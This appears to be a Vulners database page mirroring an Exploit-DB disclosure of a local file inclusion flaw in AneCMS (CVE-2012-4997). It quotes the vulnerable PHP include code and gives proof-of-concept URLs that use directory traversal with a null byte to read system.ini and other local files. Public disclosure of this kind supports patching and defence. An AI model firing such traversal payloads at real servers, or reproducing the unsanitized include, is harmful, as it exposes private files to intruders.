Lucene search
+L

AneCMS 2e2c583 - Local File Inclusion

🗓️ 04 Mar 2012 00:00:00Reported by I2sec-Jong Hwan ParkType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 39 Views

Vulnerability in AneCMS 2e2c583 - Local File Inclusion discovered in index pag

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2012-4997
19 Sep 201219:00
cve
cvelist
Cvelist
CVE-2012-4997
19 Sep 201219:00
cvelist
euvd
EUVD
EUVD-2012-4921
7 Oct 202500:30
euvd
nvd
NVD
CVE-2012-4997
19 Sep 201219:55
nvd
prion
Prion
Directory traversal
19 Sep 201219:55
prion
# Exploit Title: AneCMS v.2e2c583 LFI exploit
# Date: 03.04.2012# Author: I2sec-PJH
# Software Link: https://github.com/AneGroup/AneCMS
# Version: v.2e2c583 -----------------------------------------------------


-Description
vulnerabilities have been discovered in the index page.
-source of index.php
1. if(isset($_GET['p']))
2. include './pages/'.$_GET['p'].'.php';
3. else
4. include './pages/dash.php';
-PoC
http://localhost/acp/index.php?p=../../../../windows/system.ini%00
http://localhost/acp/index.php?p=../../../../[localfile]%00

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Mar 2012 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 27.5
EPSS0.02817
39